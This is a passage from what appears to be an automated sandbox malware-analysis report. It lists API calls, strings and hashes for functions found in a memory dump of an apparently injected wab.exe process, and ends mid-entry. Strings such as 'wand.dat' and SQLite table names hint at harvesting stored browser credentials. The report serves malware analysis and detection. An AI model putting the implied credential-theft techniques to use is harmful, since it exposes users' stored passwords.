                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004100FB
                                                                                            • memset.MSVCRT ref: 00410112
                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                            • String ID: </%s>
                                                                                            • API String ID: 3400436232-259020660
                                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040D58D
                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                                            • String ID: caption
                                                                                            • API String ID: 1523050162-4135340389
                                                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                            • String ID: MS Sans Serif
                                                                                            • API String ID: 210187428-168460110
                                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName_wcsicmpmemset
                                                                                            • String ID: edit
                                                                                            • API String ID: 2747424523-2167791130
                                                                                            • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                            • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                                            • API String ID: 3150196962-1506664499
                                                                                            • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                            • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 3384217055-0
                                                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 368790112-0
                                                                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                            • String ID:
                                                                                            • API String ID: 1889144086-0
                                                                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                            • String ID:
                                                                                            • API String ID: 1661045500-0
                                                                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                            • memcpy.MSVCRT ref: 0042EC7A
                                                                                            Strings
                                                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                            • API String ID: 1297977491-2063813899
                                                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040560C
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                            • String ID: *.*$dat$wand.dat
                                                                                            • API String ID: 2618321458-1828844352
                                                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                            • wcslen.MSVCRT ref: 00410C74
                                                                                            • _wtoi.MSVCRT ref: 00410C80
                                                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1549203181-0
                                                                                            • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                            • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00412057
                                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3550944819-0
                                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                            • memcpy.MSVCRT ref: 0040A94F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$memcpy$mallocwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 3023356884-0
                                                                                            • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                            • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • wcslen.MSVCRT ref: 0040B1DE
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                            • memcpy.MSVCRT ref: 0040B248
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$memcpy$mallocwcslen
                                                                                            • String ID:
                                                                                            • API String ID: 3023356884-0
                                                                                            • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                            • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: @
                                                                                            • API String ID: 3510742995-2766056989
                                                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@memcpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 1865533344-0
                                                                                            • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                            • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • strlen.MSVCRT ref: 0040B0D8
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                              • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                              • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                            • memcpy.MSVCRT ref: 0040B159
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$memcpy$mallocstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 1171893557-0
                                                                                            • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                            • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004144E7
                                                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                              • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                            • memset.MSVCRT ref: 0041451A
                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 1127616056-0
                                                                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: sqlite_master
                                                                                            • API String ID: 438689982-3163232059
                                                                                            • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                            • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                            • wcscpy.MSVCRT ref: 00414DF3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3917621476-0
                                                                                            • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                            • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                            • _snwprintf.MSVCRT ref: 00410FE1
                                                                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
